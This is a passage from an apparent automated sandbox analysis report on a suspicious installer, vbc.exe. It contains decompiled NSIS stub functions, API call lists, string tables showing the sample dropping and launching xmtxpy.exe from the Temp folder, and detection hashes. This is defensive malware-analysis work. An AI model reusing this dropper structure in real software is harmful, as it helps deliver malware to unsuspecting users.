                          							EnableWindow( *0x41f458, _t117);
                          							__eflags = _t117 - _t133;
                          							if(_t117 == _t133) {
                          								_push(1);
                          							} else {
                          								_push(_t133);
                          							}
                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							if(__eflags == 0) {
                          								_push( *0x420490);
                          							} else {
                          								SendMessageA(_t125, 0x401, 2, _t133);
                          								_push( *0x41f458);
                          							}
                          							E00403E6C();
                          							E00405A85(0x420498, "fwwmjbqpxzax Setup");
                          							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                          							SetWindowTextA(_t125, 0x420498);
                          							_push(_t133);
                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                          							__eflags = _t67;
                          							if(_t67 != 0) {
                          								continue;
                          							} else {
                          								__eflags =  *_t130 - _t133;
                          								if( *_t130 == _t133) {
                          									continue;
                          								}
                          								__eflags =  *(_t130 + 4) - 5;
                          								if( *(_t130 + 4) != 5) {
                          									DestroyWindow( *0x423678);
                          									 *0x41fc68 = _t130;
                          									__eflags =  *_t130 - _t133;
                          									if( *_t130 <= _t133) {
                          										goto L58;
                          									}
                          									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                          									__eflags = _t73 - _t133;
                          									 *0x423678 = _t73;
                          									if(_t73 == _t133) {
                          										goto L58;
                          									}
                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                          									_push(6);
                          									E00403E37(_t73);
                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                          									ScreenToClient(_t125, _t134 + 0x10);
                          									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                          									_push(_t133);
                          									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                          									__eflags =  *0x42366c - _t133; // 0x7fffffff
                          									if(__eflags != 0) {
                          										goto L61;
                          									}
                          									ShowWindow( *0x423678, 8);
                          									E00403E83(0x405);
                          									goto L58;
                          								}
                          								__eflags =  *0x423f2c - _t133; // 0x0
                          								if(__eflags != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *0x423f20 - _t133; // 0x0
                          								if(__eflags != 0) {
                          									continue;
                          								}
                          								goto L61;
                          							}
                          						}
                          						DestroyWindow( *0x423678); // executed
                          						 *0x423ea8 = _t133;
                          						EndDialog(_t125,  *0x41f860);
                          						goto L58;
                          					} else {
                          						__eflags = _t35 - 1;
                          						if(_t35 != 1) {
                          							L33:
                          							__eflags =  *_t130 - _t133;
                          							if( *_t130 == _t133) {
                          								goto L61;
                          							}
                          							goto L34;
                          						}
                          						_push(0);
                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                          						__eflags = _t86;
                          						if(_t86 == 0) {
                          							goto L33;
                          						}
                          						SendMessageA( *0x423678, 0x40f, 0, 1);
                          						__eflags =  *0x42366c - _t133; // 0x7fffffff
                          						return 0 | __eflags == 0x00000000;
                          					}
                          				} else {
                          					_t125 = _a4;
                          					_t133 = 0;
                          					if(_t115 == 0x47) {
                          						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                          					}
                          					if(_t115 == 5) {
                          						asm("sbb eax, eax");
                          						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                          					}
                          					if(_t115 != 0x40d) {
                          						__eflags = _t115 - 0x11;
                          						if(_t115 != 0x11) {
                          							__eflags = _t115 - 0x111;
                          							if(_t115 != 0x111) {
                          								L26:
                          								return E00403E9E(_t115, _a12, _a16);
                          							}
                          							_t132 = _a12 & 0x0000ffff;
                          							_t126 = GetDlgItem(_t125, _t132);
                          							__eflags = _t126 - _t133;
                          							if(_t126 == _t133) {
                          								L13:
                          								__eflags = _t132 - 1;
                          								if(_t132 != 1) {
                          									__eflags = _t132 - 3;
                          									if(_t132 != 3) {
                          										_t127 = 2;
                          										__eflags = _t132 - _t127;
                          										if(_t132 != _t127) {
                          											L25:
                          											SendMessageA( *0x423678, 0x111, _a12, _a16);
                          											goto L26;
                          										}
                          										__eflags =  *0x423f2c - _t133; // 0x0
                          										if(__eflags == 0) {
                          											_t99 = E0040140B(3);
                          											__eflags = _t99;
                          											if(_t99 != 0) {
                          												goto L26;
                          											}
                          											 *0x41f860 = 1;
                          											L21:
                          											_push(0x78);
                          											L22:
                          											E00403E10();
                          											goto L26;
                          										}
                          										E0040140B(_t127);
                          										 *0x41f860 = _t127;
                          										goto L21;
                          									}
                          									__eflags =  *0x4091bc - _t133; // 0x0
                          									if(__eflags <= 0) {
                          										goto L25;
                          									}
                          									_push(0xffffffff);
                          									goto L22;
                          								}
                          								_push(_t132);
                          								goto L22;
                          							}
                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                          							_t103 = IsWindowEnabled(_t126);
                          							__eflags = _t103;
                          							if(_t103 == 0) {
                          								goto L61;
                          							}
                          							goto L13;
                          						}
                          						SetWindowLongA(_t125, _t133, _t133);
                          						return 1;
                          					} else {
                          						DestroyWindow( *0x423678);
                          						 *0x423678 = _a12;
                          						L58:
                          						_t141 =  *0x421498 - _t133; // 0x0
                          						if(_t141 == 0) {
                          							_t142 =  *0x423678 - _t133; // 0x0
                          							if(_t142 != 0) {
                          								ShowWindow(_t125, 0xa);
                          								 *0x421498 = 1;
                          							}
                          						}
                          						L61:
                          						return 0;
                          					}
                          				}
                          			}

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                          • ShowWindow.USER32(?), ref: 004039BD
                          • DestroyWindow.USER32 ref: 004039D1
                          • SetWindowLongA.USER32 ref: 004039ED
                          • GetDlgItem.USER32(?,?), ref: 00403A0E
                          • SendMessageA.USER32 ref: 00403A22
                          • IsWindowEnabled.USER32(00000000), ref: 00403A29
                          • GetDlgItem.USER32(?,00000001), ref: 00403AD7
                          • GetDlgItem.USER32(?,00000002), ref: 00403AE1
                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403AFB
                          • SendMessageA.USER32 ref: 00403B4C
                          • GetDlgItem.USER32(?,00000003), ref: 00403BF2
                          • ShowWindow.USER32(00000000,?), ref: 00403C13
                          • EnableWindow.USER32(?,?), ref: 00403C25
                          • EnableWindow.USER32(?,?), ref: 00403C40
                          • GetSystemMenu.USER32 ref: 00403C56
                          • EnableMenuItem.USER32 ref: 00403C5D
                          • SendMessageA.USER32 ref: 00403C75
                          • SendMessageA.USER32 ref: 00403C88
                          • lstrlenA.KERNEL32(00420498,?,00420498,fwwmjbqpxzax Setup), ref: 00403CB1
                          • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                          • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: fwwmjbqpxzax Setup
                          • API String ID: 184305955-1093331389
                          • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                          • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 4035e3-4035fb call 405da3 212 4035fd-40360d call 4059e3 209->212 213 40360f-403636 call 40596c 209->213 220 403659-403678 call 403897 call 405659 212->220 218 403638-403649 call 40596c 213->218 219 40364e-403654 lstrcatA 213->219 218->219 219->220 227 40367e-403683 220->227 228 4036ff-403707 call 405659 220->228 227->228 229 403685-4036a9 call 40596c 227->229 234 403715-40373a LoadImageA 228->234 235 403709-403710 call 405aa7 228->235 229->228 236 4036ab-4036ad 229->236 238 403740-403776 RegisterClassA 234->238 239 4037c9-4037d1 call 40140b 234->239 235->234 241 4036be-4036ca lstrlenA 236->241 242 4036af-4036bc call 4055a3 236->242 243 40377c-4037c4 SystemParametersInfoA CreateWindowExA 238->243 244 40388d 238->244 251 4037d3-4037d6 239->251 252 4037db-4037e6 call 403897 239->252 248 4036f2-4036fa call 405578 call 405a85 241->248 249 4036cc-4036da lstrcmpiA 241->249 242->241 243->239 246 40388f-403896 244->246 248->228 249->248 250 4036dc-4036e6 GetFileAttributesA 249->250 255 4036e8-4036ea 250->255 256 4036ec-4036ed call 4055bf 250->256 251->246 262 403864-40386c call 404ef5 252->262 263 4037e8-403805 ShowWindow LoadLibraryA 252->263 255->248 255->256 256->248 270 403886-403888 call 40140b 262->270 271 40386e-403874 262->271 264 403807-40380c LoadLibraryA 263->264 265 40380e-403820 GetClassInfoA 263->265 264->265 268 403822-403832 GetClassInfoA RegisterClassA 265->268 269 403838-40385b DialogBoxParamA call 40140b 265->269 268->269 275 403860-403862 269->275 270->244 271->251 273 40387a-403881 call 40140b 271->273 273->251 275->246
                          C-Code - Quality: 96%
                          			E004035E3() {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t20;
                          				signed int _t24;
                          				void* _t28;
                          				void* _t30;
                          				int _t31;
                          				void* _t34;
                          				struct HINSTANCE__* _t37;
                          				int _t38;
                          				intOrPtr _t39;
                          				int _t42;
                          				intOrPtr _t59;
                          				char _t61;
                          				CHAR* _t63;
                          				signed char _t67;
                          				struct HINSTANCE__* _t75;
                          				CHAR* _t78;
                          				intOrPtr _t80;
                          				CHAR* _t85;
                          
                          				_t80 =  *0x423eb0; // 0x8c0fa0
                          				_t20 = E00405DA3(6);
                          				_t87 = _t20;
                          				if(_t20 == 0) {
                          					_t78 = 0x420498;
                          					"1033" = 0x7830;
                          					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                          					__eflags =  *0x420498;
                          					if(__eflags == 0) {
                          						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                          					}
                          					lstrcatA("1033", _t78);
                          				} else {
                          					E004059E3("1033",  *_t20() & 0x0000ffff);
                          				}
                          				E00403897(_t75, _t87);
                          				_t24 =  *0x423eb8; // 0x80
                          				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                          				 *0x423f20 = _t24 & 0x00000020;
                          				if(E00405659(_t87, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                          					L16:
                          					if(E00405659(_t95, _t84) == 0) {
                          						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                          					}
                          					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040);
                          					 *0x423688 = _t28;
                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                          						L21:
                          						if(E0040140B(0) == 0) {
                          							_t30 = E00403897(_t75, __eflags);
                          							__eflags =  *0x423f40; // 0x0
                          							if(__eflags != 0) {
                          								_t31 = E00404EF5(_t30, 0);
                          								__eflags = _t31;
                          								if(_t31 == 0) {
                          									E0040140B(1);
                          									goto L33;
                          								}
                          								__eflags =  *0x42366c; // 0x7fffffff
                          								if(__eflags == 0) {
                          									E0040140B(2);
                          								}
                          								goto L22;
                          							}
                          							ShowWindow( *0x420470, 5); // executed
                          							_t37 = LoadLibraryA("RichEd20"); // executed
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								LoadLibraryA("RichEd32");
                          							}
                          							_t85 = "RichEdit20A";
                          							_t38 = GetClassInfoA(0, _t85, 0x423640);
                          							__eflags = _t38;
                          							if(_t38 == 0) {
                          								GetClassInfoA(0, "RichEdit", 0x423640);
                          								 *0x423664 = _t85;
                          								RegisterClassA(0x423640);
                          							}
                          							_t39 =  *0x423680; // 0x0
                          							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0); // executed
                          							E0040140B(5);
                          							return _t42;
                          						}
                          						L22:
                          						_t34 = 2;
                          						return _t34;
                          					} else {
                          						_t75 =  *0x423ea0; // 0x400000
                          						 *0x423654 = _t28;
                          						_v20 = 0x624e5f;
                          						 *0x423644 = E00401000;
                          						 *0x423650 = _t75;
                          						 *0x423664 =  &_v20;
                          						if(RegisterClassA(0x423640) == 0) {
                          							L33:
                          							__eflags = 0;
                          							return 0;
                          						}
                          						_t12 =  &_v16; // 0x624e5f
                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                          						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                          						goto L21;
                          					}
                          				} else {
                          					_t75 =  *(_t80 + 0x48);
                          					if(_t75 == 0) {
                          						goto L16;
                          					}
                          					_t59 =  *0x423ed8; // 0x8c1cb8
                          					_t78 = 0x422e40;
                          					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
                          					_t61 =  *0x422e40; // 0x43
                          					if(_t61 == 0) {
                          						goto L16;
                          					}
                          					if(_t61 == 0x22) {
                          						_t78 = 0x422e41;
                          						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                          					}
                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                          						L15:
                          						E00405A85(_t84, E00405578(_t78));
                          						goto L16;
                          					} else {
                          						_t67 = GetFileAttributesA(_t78);
                          						if(_t67 == 0xffffffff) {
                          							L14:
                          							E004055BF(_t78);
                          							goto L15;
                          						}
                          						_t95 = _t67 & 0x00000010;
                          						if((_t67 & 0x00000010) != 0) {
                          							goto L15;
                          						}
                          						goto L14;
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\Public\vbc.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,?,?,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\Public\vbc.exe" ), ref: 004036BF
                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,?,?,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 004036DD
                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403726
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          • RegisterClassA.USER32 ref: 0040376D
                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                          • CreateWindowExA.USER32 ref: 004037BE
                          • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                          • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                          • GetClassInfoA.USER32(00000000,RichEdit20A,00423640), ref: 0040381C
                          • GetClassInfoA.USER32(00000000,RichEdit,00423640), ref: 00403829
                          • RegisterClassA.USER32(00423640), ref: 00403832
                          • DialogBoxParamA.USER32 ref: 00403851
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 914957316-1845516748
                          • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                          • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 96%
                          			E00402C5B(void* __eflags, signed int _a4) {
                          				long _v8;
                          				long _v12;
                          				intOrPtr _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v40;
                          				char _v300;
                          				signed int _t54;
                          				void* _t57;
                          				void* _t62;
                          				signed int _t63;
                          				intOrPtr _t65;
                          				void* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr _t71;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t82;
                          				signed int _t83;
                          				signed int _t89;
                          				intOrPtr _t92;
                          				signed int _t101;
                          				signed int _t103;
                          				void* _t105;
                          				signed int _t106;
                          				signed int _t109;
                          				void* _t110;
                          
                          				_v8 = 0;
                          				_v12 = 0;
                          				 *0x423eac = GetTickCount() + 0x3e8;
                          				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
                          				_t105 = E0040575C("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
                          				 *0x409010 = _t105;
                          				if(_t105 == 0xffffffff) {
                          					return "Error launching installer";
                          				}
                          				E00405A85("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
                          				E00405A85(0x42b000, E004055BF("C:\\Users\\Public"));
                          				_t54 = GetFileSize(_t105, 0);
                          				__eflags = _t54;
                          				 *0x41f048 = _t54;
                          				_t109 = _t54;
                          				if(_t54 <= 0) {
                          					L22:
                          					E00402BC5(1);
                          					__eflags =  *0x423eb4; // 0x7e00
                          					if(__eflags == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v12;
                          					if(_v12 == 0) {
                          						L26:
                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                          						_t110 = _t57;
                          						E00405E7D(0x40afb0);
                          						E0040578B( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                          						__eflags = _t62 - 0xffffffff;
                          						 *0x409014 = _t62;
                          						if(_t62 != 0xffffffff) {
                          							_t63 =  *0x423eb4; // 0x7e00
                          							_t65 = E004031DA(_t63 + 0x1c);
                          							 *0x41f04c = _t65;
                          							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                          							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                          							__eflags = _t68 - _v20;
                          							if(_t68 == _v20) {
                          								__eflags = _v40 & 0x00000001;
                          								 *0x423eb0 = _t110;
                          								 *0x423eb8 =  *_t110;
                          								if((_v40 & 0x00000001) != 0) {
                          									 *0x423ebc =  *0x423ebc + 1;
                          									__eflags =  *0x423ebc;
                          								}
                          								_t45 = _t110 + 0x44; // 0x44
                          								_t70 = _t45;
                          								_t101 = 8;
                          								do {
                          									_t70 = _t70 - 8;
                          									 *_t70 =  *_t70 + _t110;
                          									_t101 = _t101 - 1;
                          									__eflags = _t101;
                          								} while (_t101 != 0);
                          								_t71 =  *0x41703c; // 0x56a38
                          								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                          								E0040571D(0x423ec0, _t110 + 4, 0x40);
                          								__eflags = 0;
                          								return 0;
                          							}
                          							goto L30;
                          						}
                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                          					}
                          					E004031DA( *0x417038);
                          					_t77 = E004031A8( &_a4, 4); // executed
                          					__eflags = _t77;
                          					if(_t77 == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v8 - _a4;
                          					if(_v8 != _a4) {
                          						goto L30;
                          					}
                          					goto L26;
                          				} else {
                          					do {
                          						_t79 =  *0x423eb4; // 0x7e00
                          						_t106 = _t109;
                          						asm("sbb eax, eax");
                          						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
                          						__eflags = _t109 - _t82;
                          						if(_t109 >= _t82) {
                          							_t106 = _t82;
                          						}
                          						_t83 = E004031A8(0x417048, _t106); // executed
                          						__eflags = _t83;
                          						if(_t83 == 0) {
                          							E00402BC5(1);
                          							L30:
                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                          						}
                          						__eflags =  *0x423eb4; // 0x7e00
                          						if(__eflags != 0) {
                          							__eflags = _a4 & 0x00000002;
                          							if((_a4 & 0x00000002) == 0) {
                          								E00402BC5(0);
                          							}
                          							goto L19;
                          						}
                          						E0040571D( &_v40, 0x417048, 0x1c);
                          						_t89 = _v40;
                          						__eflags = _t89 & 0xfffffff0;
                          						if((_t89 & 0xfffffff0) != 0) {
                          							goto L19;
                          						}
                          						__eflags = _v36 - 0xdeadbeef;
                          						if(_v36 != 0xdeadbeef) {
                          							goto L19;
                          						}
                          						__eflags = _v24 - 0x74736e49;
                          						if(_v24 != 0x74736e49) {
                          							goto L19;
                          						}
                          						__eflags = _v28 - 0x74666f73;
                          						if(_v28 != 0x74666f73) {
                          							goto L19;
                          						}
                          						__eflags = _v32 - 0x6c6c754e;
                          						if(_v32 != 0x6c6c754e) {
                          							goto L19;
                          						}
                          						_a4 = _a4 | _t89;
                          						_t103 =  *0x417038; // 0x196a5
                          						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                          						_t92 = _v16;
                          						__eflags = _t92 - _t109;
                          						 *0x423eb4 = _t103;
                          						if(_t92 > _t109) {
                          							goto L30;
                          						}
                          						__eflags = _a4 & 0x00000008;
                          						if((_a4 & 0x00000008) != 0) {
                          							L15:
                          							_v12 = _v12 + 1;
                          							_t109 = _t92 - 4;
                          							__eflags = _t106 - _t109;
                          							if(_t106 > _t109) {
                          								_t106 = _t109;
                          							}
                          							goto L19;
                          						}
                          						__eflags = _a4 & 0x00000004;
                          						if((_a4 & 0x00000004) != 0) {
                          							goto L22;
                          						}
                          						goto L15;
                          						L19:
                          						__eflags = _t109 -  *0x41f048; // 0x19be0
                          						if(__eflags < 0) {
                          							_v8 = E00405E0F(_v8, 0x417048, _t106);
                          						}
                          						 *0x417038 =  *0x417038 + _t106;
                          						_t109 = _t109 - _t106;
                          						__eflags = _t109;
                          					} while (_t109 > 0);
                          					goto L22;
                          				}
                          			}

                          APIs
                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00402C6F
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C8B
                            • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405760
                            • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CD4
                          • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-1404970732
                          • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                          • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 75%
                          			E00401734(FILETIME* __ebx, void* __eflags) {
                          				void* _t33;
                          				void* _t41;
                          				void* _t43;
                          				FILETIME* _t49;
                          				FILETIME* _t62;
                          				void* _t64;
                          				signed int _t70;
                          				FILETIME* _t71;
                          				FILETIME* _t75;
                          				signed int _t77;
                          				void* _t80;
                          				CHAR* _t82;
                          				void* _t85;
                          
                          				_t75 = __ebx;
                          				_t82 = E004029E8(0x31);
                          				 *(_t85 - 8) = _t82;
                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                          				_t33 = E004055E5(_t82);
                          				_push(_t82);
                          				if(_t33 == 0) {
                          					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                          				} else {
                          					_push(0x409b68);
                          					E00405A85();
                          				}
                          				E00405CE3(0x409b68);
                          				while(1) {
                          					__eflags =  *(_t85 + 8) - 3;
                          					if( *(_t85 + 8) >= 3) {
                          						_t64 = E00405D7C(0x409b68);
                          						_t77 = 0;
                          						__eflags = _t64 - _t75;
                          						if(_t64 != _t75) {
